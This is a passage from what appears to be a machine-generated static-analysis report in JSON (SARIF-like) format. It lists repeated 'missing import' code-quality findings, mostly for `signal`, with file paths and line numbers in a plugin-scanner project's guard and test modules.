"fp|551eab17d25265938f952fd7a29d84b51db67e417cff978fce6ee882a1cf49d6"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/data_flow_rules.py"}, "region": {"startLine": 606}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144966, "scanner": "repobility-ast-engine", "fingerprint": "b396f2b454a00105b0458fd6c646941c138721495298f483c459d418013b8120", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b396f2b454a00105b0458fd6c646941c138721495298f483c459d418013b8120"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/runner.py"}, "region": {"startLine": 497}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144965, "scanner": "repobility-ast-engine", "fingerprint": "87ae1fc69568fb9985fb32b928a29fa6b27c34d66072184c5d3dbaa4544cda20", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|87ae1fc69568fb9985fb32b928a29fa6b27c34d66072184c5d3dbaa4544cda20"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/signals.py"}, "region": {"startLine": 207}}}]}, {"ruleId": "MINED107", "level": "error", 
"message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144964, "scanner": "repobility-ast-engine", "fingerprint": "de6bb94b18f54726e6ac8d268f1976752752babc1b62e0b32587df2ee647b1bc", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|de6bb94b18f54726e6ac8d268f1976752752babc1b62e0b32587df2ee647b1bc"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/composition_rules.py"}, "region": {"startLine": 76}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144963, "scanner": "repobility-ast-engine", "fingerprint": "1894d47ecc3704370142514f792a2f5a837922b512dd030ab15ddafaac22e1f4", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|1894d47ecc3704370142514f792a2f5a837922b512dd030ab15ddafaac22e1f4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/detectors.py"}, "region": {"startLine": 855}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144962, "scanner": "repobility-ast-engine", "fingerprint": "ca534d53ca55036daff3939c3ac00b4056ccd7cb48130e16face45acc7fb5f80", "category": "quality", "severity": 
"critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|ca534d53ca55036daff3939c3ac00b4056ccd7cb48130e16face45acc7fb5f80"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py"}, "region": {"startLine": 1774}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144943, "scanner": "repobility-ast-engine", "fingerprint": "46beaed9068f92121c824fbb087db4a4f0c5ac1d62ddfc8683a4aab80be17b01", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|46beaed9068f92121c824fbb087db4a4f0c5ac1d62ddfc8683a4aab80be17b01"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/risk.py"}, "region": {"startLine": 241}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144940, "scanner": "repobility-ast-engine", "fingerprint": "3e61e8155fce91d32a019bff2df5a89fc4f1872882124416d72365a4a94b23b8", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 
2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|3e61e8155fce91d32a019bff2df5a89fc4f1872882124416d72365a4a94b23b8"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_cisco_runtime_cli.py"}, "region": {"startLine": 272}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144939, "scanner": "repobility-ast-engine", "fingerprint": "9a73f43b1c918be93382b0ac22ae79773d3d5a691f1dc8fdf3e335e577765989", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|9a73f43b1c918be93382b0ac22ae79773d3d5a691f1dc8fdf3e335e577765989"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_risk.py"}, "region": {"startLine": 3997}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144938, "scanner": "repobility-ast-engine", "fingerprint": "5d9c4d047362d755c2316f0b930b50aa124f1e0ba8fb61e027dc492cc5daee06", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|5d9c4d047362d755c2316f0b930b50aa124f1e0ba8fb61e027dc492cc5daee06"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_cisco_evidence.py"}, "region": {"startLine": 63}}}]}, {"ruleId": "MINED107", "level": "error", 
"message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144937, "scanner": "repobility-ast-engine", "fingerprint": "775e5263325c17ec47e07f54247ee847c3bd6a7d60ad981c9e53f60aa2ea505b", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|775e5263325c17ec47e07f54247ee847c3bd6a7d60ad981c9e53f60aa2ea505b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime_signals.py"}, "region": {"startLine": 31}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `copy` used but not imported"}, "properties": {"repobilityId": 144919, "scanner": "repobility-ast-engine", "fingerprint": "ec629276d1007f42d5de1dec57b49671b29dcabf8bd17cba2fc688dbf97fb3ff", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|ec629276d1007f42d5de1dec57b49671b29dcabf8bd17cba2fc688dbf97fb3ff"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_provenance.py"}, "region": {"startLine": 362}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144912, "scanner": "repobility-ast-engine", "fingerprint": "e129447ba66a1a78fab89db23ff5d4818d4947b56bc3221cb14979ac07930bbd", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": 
"open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|e129447ba66a1a78fab89db23ff5d4818d4947b56bc3221cb14979ac07930bbd"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_skill_protection.py"}, "region": {"startLine": 244}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144911, "scanner": "repobility-ast-engine", "fingerprint": "3bccbfdb70fc9f27989728d55748e8f78b8c47f035aec40143a5a74612972234", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|3bccbfdb70fc9f27989728d55748e8f78b8c47f035aec40143a5a74612972234"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_mcp_detectors.py"}, "region": {"startLine": 374}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144910, "scanner": "repobility-ast-engine", "fingerprint": "b292ef4cbe893eba66d9f3c3bbc31153ece4abed8058f47ddf36c1f15839dd89", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": 
"fp|b292ef4cbe893eba66d9f3c3bbc31153ece4abed8058f47ddf36c1f15839dd89"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime_detectors.py"}, "region": {"startLine": 316}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144907, "scanner": "repobility-ast-engine", "fingerprint": "261ad75e6ad95f299742d679eef316a53dd84baa85adb9dc82ad90c5dbb972da", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|261ad75e6ad95f299742d679eef316a53dd84baa85adb9dc82ad90c5dbb972da"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime.py"}, "region": {"startLine": 9621}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144906, "scanner": "repobility-ast-engine", "fingerprint": "1763ba1bdc7ce79c73126378ba36b65bd82292d167690b20b4c2ae71a6756630", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|1763ba1bdc7ce79c73126378ba36b65bd82292d167690b20b4c2ae71a6756630"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_skill_protection_phase14.py"}, "region": {"startLine": 31}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used 
but not imported"}, "properties": {"repobilityId": 144903, "scanner": "repobility-ast-engine", "fingerprint": "4c013c27c12ae8b0ea6ea2d6c936aba59cdca6542743252652367b6d98811114", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4c013c27c12ae8b0ea6ea2d6c936aba59cdca6542743252652367b6d98811114"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_phase05_approval_memory.py"}, "region": {"startLine": 414}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144902, "scanner": "repobility-ast-engine", "fingerprint": "5b6a3c5bf88ff40caaeddb496cffc7a3d219d0c653c28fc0f7d339e9576f6805", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|5b6a3c5bf88ff40caaeddb496cffc7a3d219d0c653c28fc0f7d339e9576f6805"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_data_flow.py"}, "region": {"startLine": 183}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144900, "scanner": "repobility-ast-engine", "fingerprint": "656d24e6dc746bb67d9ab9f6aa44aa289b7ba7a32d5983ec5c0b3a28bcf19553", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, 
"reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|656d24e6dc746bb67d9ab9f6aa44aa289b7ba7a32d5983ec5c0b3a28bcf19553"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_supply_chain.py"}, "region": {"startLine": 174}}}]}]}]}